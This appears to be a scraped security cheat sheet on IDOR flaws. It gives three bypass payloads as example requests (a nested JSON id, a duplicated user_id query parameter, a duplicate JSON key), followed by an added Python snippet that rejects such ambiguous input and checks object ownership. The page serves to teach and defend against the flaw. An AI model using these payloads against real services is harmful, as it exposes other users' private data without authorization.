IDOR

 Insecure Direct Object Reference (IDOR) | LaptrinhX

 

 Trick


{"id":111} --> 401 Unauthorized
{"id":{"id":111}} --> 200 OK
 
 
Using HTTP parameter pollution

GET /api_v1/messages?user_id=VICTIM_ID --> 401 

GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200
 
 
In JSON (duplicate key in the body)

POST /api/get_profile
Content-Type: application/json

{"user_id":<attacker_id>,"user_id":<victim's_id>}
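
Server-side counterpart to the three tricks above, as an added example that is not part of the original page: strict input handling that rejects a nested object where an id is expected, a repeated query parameter, and a duplicate JSON key, then runs the ownership check on the single parsed value. It assumes these bypasses work because the access check and the handler read the identifier differently; all function names are hypothetical.

```python
import json
from urllib.parse import parse_qsl


class AmbiguousInput(ValueError):
    """Raised when a request carries an identifier in an ambiguous form."""


def _no_duplicate_keys(pairs):
    # object_pairs_hook receives every key/value pair, including repeats
    # that json.loads would otherwise silently collapse (last one wins).
    seen = {}
    for key, value in pairs:
        if key in seen:
            raise AmbiguousInput(f"duplicate JSON key: {key!r}")
        seen[key] = value
    return seen


def strict_json_id(body, field="id"):
    """Parse a JSON body and return `field` only if it is a plain integer."""
    data = json.loads(body, object_pairs_hook=_no_duplicate_keys)
    if not isinstance(data, dict):
        raise AmbiguousInput("body must be a JSON object")
    value = data.get(field)
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(value, bool) or not isinstance(value, int):
        raise AmbiguousInput(f"{field!r} must be an integer")
    return value


def strict_query_id(query, field="user_id"):
    """Return `field` from a query string, rejecting repeated parameters."""
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == field]
    if len(values) != 1:
        raise AmbiguousInput(f"expected exactly one {field!r}, got {len(values)}")
    return values[0]


def authorize(session_user_id, requested_id):
    """Object-level check, run on the same parsed value the handler will use."""
    if str(session_user_id) != str(requested_id):
        raise PermissionError("requested object does not belong to the caller")
    return requested_id
```
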

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 
